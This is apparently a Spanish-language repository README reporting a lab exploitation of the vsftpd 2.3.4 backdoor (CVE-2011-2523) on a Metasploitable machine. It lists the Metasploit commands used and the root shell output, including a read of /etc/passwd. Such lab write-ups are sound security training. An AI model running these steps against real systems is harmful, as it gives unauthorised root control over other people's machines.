
Evaluación de vulnerabilidades y explotación de vsftpd 2.3.4 (CVE-2011-2523) mediante Metasploit. Informe completo y prueba de acceso root incluidos.
Explotación de una vulnerabilidad conocida en
vsftpd 2.3.4usando Metasploit.
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorvsftpd 2.3.4 contiene un backdoor malicioso que abre un shell de comandos en el puerto 6200 cuando se recibe un nombre de usuario especialmente diseñado (que termina en :)).
CVE: CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
El acceso root al shell otorga al atacante el control total sobre el sistema objetivo — incluyendo escalada de privilegios, movimiento lateral, exfiltración de datos y acceso persistente.
📝 Informe PDF completo disponible en este repositorio: vsftpd-exploit-report.pdf
Hecho con 🔥 por vedpakhare